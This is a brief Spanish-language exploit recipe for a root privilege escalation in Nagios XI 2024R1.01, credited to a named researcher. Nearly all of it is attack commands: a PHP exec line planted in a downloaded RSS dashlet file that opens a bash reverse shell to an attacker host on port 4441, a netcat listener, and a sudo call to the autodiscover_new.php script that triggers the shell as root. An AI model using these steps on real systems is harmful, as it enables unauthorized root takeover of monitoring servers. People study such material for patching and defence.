
Escalada de privilegios para Nagios XI 2024R1.01, que permite acceso root completo desde usuarios NAGIOS o APACHE mediante inyección maliciosa de dashlets RSS y ejecución de comandos sudo.
CVE descubierto por: K. Wahab (Neo`X)
En este ejemplo se utiliza el RSS Dashlet.
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
Ve a la página de administración de "dashlets" y descarga un Dashlet:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
Modifica el archivo *.inc.php:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(Nota: Después de ejecutar el comando recibirás la conexión como APACHE, usa CTRL+C para salir y reinicia el listener nuevamente varias veces)
